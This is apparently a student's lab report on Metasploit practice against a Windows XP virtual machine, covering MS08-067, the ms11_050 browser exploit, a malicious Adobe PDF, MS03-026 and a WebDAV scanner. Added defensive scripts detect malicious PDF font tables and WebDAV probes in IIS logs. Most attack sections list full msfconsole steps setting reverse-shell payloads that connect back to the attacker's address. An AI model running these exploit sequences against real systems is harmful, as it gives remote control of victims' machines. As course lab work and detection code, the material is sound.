Experimental content
The goal of this practice is to master the basic application methods of metasploit, focusing on the ideas behind three commonly used attack methods. Specifically, the following need to be completed:
An active attack practice, such as MS08-067;
An attack against browsers, such as ms11-050;
A client-side attack, such as Adobe;
Successful application of any one of the auxiliary modules.
The above four small practices are not limited to the examples given, and at least one of them is required to be different from those of all other students.
Active Attack Practice MS08-067 Vulnerability
- Enter the msf console:
msfconsole
- Search for this vulnerability:
search ms08_067
- Use this exploit:
use exploit/windows/smb/ms08_067_netapi
- List the available payloads:
show payloads
- Select a reverse-shell payload (tcp reverse connection):
set payload generic/shell_reverse_tcp
- Set the attacker's ip address:
set LHOST 192.168.126.128
- Set the attack port:
set LPORT 5229
- Set the ip address of the target machine:
set RHOST 192.168.126.136
- Select the target system type:
set target 0
- Attack:
exploit
- The following figure shows the successful attack. Enter ipconfig in kali to display the ip address of the target machine:
ipconfig
- Check the ip address of the target machine in XP; the two are exactly the same.
Browser Attacks ms11_050
- Enter the console:
msfconsole
- Enter the command to use the ms11_050 vulnerability:
use windows/browser/ms11_050_mshtml_cobjectelement
- Enter the command to use an http reverse connection:
set payload windows/meterpreter/reverse_http
- Set the IP address of kali:
set LHOST 192.168.126.128
- Set the port:
set LPORT 5229
- Set the resource identifier path:
set URIPATH fyh5229
- Attack:
exploit
- Enter the URL with the local IP shown in the picture above into the IE browser in WIN XP. A problem occurs and the window that appears has to be closed. At the same time, 360 gives a notice that it needs to be repaired.
- But back in KALI, while the session is being established, the IE browser has already closed the page.
- I set the browser's options, set the security level to the lowest level, and enabled the plug-in settings, but the session connection still failed...
- I will look into this.
Client-Side Attack Adobe
- Enter the msf console:
msfconsole
- Enter the following to find vulnerabilities related to adobe:
search adobe
- I chose the module windows/fileformat/adobe_cooltype_sing.
- Enter the following to use a reverse connection over tcp:
set payload windows/meterpreter/reverse_tcp
- Set the IP address and port number.
- Enter the following command to generate the pdf file, then attack:
set FILENAME 5229.pdf
- The figure below shows the sign that the PDF file was generated successfully.
- According to the storage path, find the PDF file and put it on the target machine.
- But I couldn't find the file after searching for a long time. Later, as shown in the figure below, I selected "Show hidden files", and then I could find the hidden folder.
- I first copied the modified file to my host, and it was immediately deleted by 360.
- Enter monitor mode in msf, set the tcp reverse connection payload, and set the ip address and port number:
set payload windows/meterpreter/reverse_tcp
- Attack.
- Open the 5229.pdf file on XP; the attack succeeds in kali.
- Enter ipconfig: the ip address of xp is displayed, which proves that the attack worked.
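A defensive check to go with the file-format attack above: the adobe_cooltype_sing module relies on the SING table of a font embedded in the PDF, whose 28-byte uniqueName field at table offset 16 overruns a fixed buffer in CoolType when it carries no NUL terminator. The following is an added example written for this page (not part of the lab report or of Metasploit): a simplified scanner that inflates the PDF's streams, locates SING tables in any embedded sfnt font and flags an unterminated uniqueName; the PDF parser trusts a direct /Length value and skips indirect objects, and the sample files it scans are constructed, not real malicious documents.

```python
import re
import struct
import zlib

def extract_streams(pdf):
    """Yield each PDF stream body, inflated if FlateDecode; /Length is trusted (demo parser)."""
    for m in re.finditer(rb"<<(.*?)>>\s*stream\r?\n", pdf, re.S):
        params = m.group(1)
        length = re.search(rb"/Length\s+(\d+)", params)
        if not length:
            continue  # indirect /Length objects are not handled in this demo
        body = pdf[m.end(): m.end() + int(length.group(1))]
        if b"/FlateDecode" in params:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue
        yield body

def sing_tables(font):
    """Return (offset, length) of every SING entry in an sfnt (TrueType/OpenType) table directory."""
    if font[:4] not in (b"\x00\x01\x00\x00", b"OTTO", b"true"):
        return []
    num_tables = struct.unpack(">H", font[4:6])[0]
    directory = font[12:12 + 16 * num_tables]  # 16-byte entries: tag, checksum, offset, length
    out = []
    for i in range(len(directory) // 16):
        tag, _checksum, off, length = struct.unpack_from(">4sIII", directory, 16 * i)
        if tag == b"SING":
            out.append((off, length))
    return out

def suspicious_sing(pdf):
    """One finding per embedded SING table; the 28-byte uniqueName (table offset 16) is
    flagged when it has no NUL terminator, the shape the CoolType overflow relies on."""
    findings = []
    for body in extract_streams(pdf):
        for off, length in sing_tables(body):
            name = body[off + 16: off + 44]
            findings.append({"table_len": length,
                             "unterminated_name": len(name) == 28 and b"\x00" not in name})
    return findings

def make_pdf_with_sing(unique_name):
    """Constructed sample (not an exploit): one FlateDecode stream holding a minimal sfnt
    whose only table is SING, with the given bytes as its NUL-padded uniqueName."""
    table = struct.pack(">8H", 1, 0, 1, 0, 0, 1000, 0, 0) + unique_name[:28].ljust(28, b"\x00")
    sfnt = b"\x00\x01\x00\x00" + struct.pack(">4H", 1, 16, 0, 0)
    sfnt += struct.pack(">4sIII", b"SING", 0, 28, len(table)) + table
    data = zlib.compress(sfnt)
    return (b"%PDF-1.4\n1 0 obj\n<< /Length " + str(len(data)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + data + b"\nendstream\nendobj\n%%EOF\n")
```

A legitimate SING glyphlet has a short, NUL-terminated uniqueName, so a hit from this heuristic is worth quarantining and scanning the file with a current Reader or antivirus rather than opening it.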
Auxiliary module webdav
webdav: WebDAV is a communication protocol based on the HTTP 1.1 protocol. Because WebDAV is integrated with Windows XP and IIS, it has the security features provided by both. These include IIS permissions specified in the Internet Information Services snap-in and discretionary access control lists (DACLs) in the NTFS file system.
- Enter the msf console.
- Use the following command to display all auxiliary modules and their purpose:
show auxiliary
- Choose the module scanner/http/webdav_scanner, then view its configuration options:
show options
- Set the ip address of kali and the number of threads.
- Attack.
- The result of the attack is shown in the figure above, but the target machine does not have IIS installed.
- Refer to how to enable IIS to install IIS on the Windows XP system.
- Allow webdav and attack again; the following message is obtained:
[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED
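The scanner above sends an HTTP OPTIONS request and reads the server's reply to decide that a host "has WEBDAV ENABLED", and such probes leave traces in the IIS logs. The following added example (written for this page, not part of the lab report or of Metasploit) parses a constructed IIS 6.0 W3C log excerpt, groups WebDAV-method requests by client address and records whether the server ever answered 207 Multi-Status, which confirms WebDAV was actually serving; the log lines and addresses are made up for the demonstration.

```python
from collections import Counter, defaultdict

# Constructed IIS 6.0 W3C log excerpt (not taken from the lab report): the default field
# order, a scanner's OPTIONS probe from 192.168.126.128 and two PROPFIND requests after it.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2019-04-20 10:01:02 192.168.126.137 GET /index.htm - 80 - 192.168.126.1 Mozilla/4.0 200 0 0
2019-04-20 10:01:05 192.168.126.137 OPTIONS / - 80 - 192.168.126.128 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2019-04-20 10:01:05 192.168.126.137 PROPFIND / - 80 - 192.168.126.128 Mozilla/4.0+(compatible;+MSIE+6.0) 207 0 0
2019-04-20 10:01:06 192.168.126.137 PROPFIND /test/ - 80 - 192.168.126.128 Mozilla/4.0+(compatible;+MSIE+6.0) 404 0 0
2019-04-20 10:02:00 192.168.126.137 GET /about.htm - 80 - 192.168.126.1 Mozilla/4.0 200 0 0
"""

# OPTIONS is how WebDAV support is discovered; the rest are WebDAV-only methods.
WEBDAV_METHODS = {"OPTIONS", "PROPFIND", "PROPPATCH", "MKCOL",
                  "COPY", "MOVE", "LOCK", "UNLOCK"}

def parse_w3c(log_text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields directive."""
    fields, records = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")  # IIS replaces spaces inside a field with '+'
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records

def find_webdav_probes(log_text):
    """Group WebDAV-method requests by client ip; dav_served becomes True when the server
    answered 207 Multi-Status, i.e. WebDAV really was enabled, not just probed for."""
    report = defaultdict(lambda: {"methods": Counter(), "dav_served": False})
    for rec in parse_w3c(log_text):
        if rec["cs-method"] in WEBDAV_METHODS:
            entry = report[rec["c-ip"]]
            entry["methods"][rec["cs-method"]] += 1
            if rec["sc-status"] == "207":
                entry["dav_served"] = True
    return dict(report)

if __name__ == "__main__":
    for ip, info in find_webdav_probes(SAMPLE_LOG).items():
        print(ip, dict(info["methods"]), "WebDAV served:", info["dav_served"])
```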
RPC interface long hostname remote buffer overflow vulnerability (MS03-026)
Remote Procedure Call (RPC) is a remote procedure call protocol used by the Windows operating system. RPC provides an inter-process interactive communication mechanism that allows a program running on a computer to seamlessly execute code on a remote system.
- Use the exploit:
use exploit/windows/dcerpc/ms03_026_dcom
- Use the tcp reverse connection payload:
set payload windows/meterpreter/reverse_tcp
- View the configuration options for this vulnerability:
show options
- Set the host ip:
set LHOST 192.168.126.128
- Set the ip of the machine that bounces the shell back:
set RHOST 192.168.126.137
- The attack is successful, but there is no way to establish a session.
Situations in which the "No session was created" message occurs:
① The exploit used does not work on the selected target. It may be a different version of the vulnerability, or there may be a problem with the target's configuration.
② The exploit you used is configured to use a payload that does not create an interactive session.
According to the above prompts, show options displays that the target "Windows NT SP3-6a/2000/XP/2003 Universal" can be used. I checked my own virtual machine, and neither of its two versions, "Microsoft Windows XP Professional" and "Microsoft Windows XP Professional SP2", can be used to establish a session. I checked the exploited vulnerability and found no errors.
Because the vulnerability is related to the RPC protocol and remote access, I opened the Windows XP system security settings in the virtual machine and turned off remote assistance and the related services (everything that could be turned off), and looked up what the "RPC server unavailable" message displayed on XP means, but I was still unable to establish a session.
Well, I really can't solve this problem...
Post-experiment questions and answers
Explain what exploit, payload and encode are in your own words.
exploit: the word means "to make use of" (利用), that is, hackers make use of loopholes to attack computers. There are loopholes that may not be exploitable, but there must be loopholes that can be exploited.
payload: Payload. Usually when transmitting data, in order to make the transmission more reliable, the original data is transmitted in batches, certain auxiliary information is added to the head and tail of each batch of data, and the original data is the payload.
encode: Encoder, used to encode the payload so that the payload is protected from being discovered.
Experiment summary and experience
This experiment is actually not difficult, but that does not mean that every attack can succeed, nor that every attack can successfully establish a session. I did several experiments, only a few of them succeeded, and I did not write down some of the failures.
Although most of them failed, there is no doubt that in this experiment I learned a lot of knowledge by looking up the loopholes in the materials and studying by myself.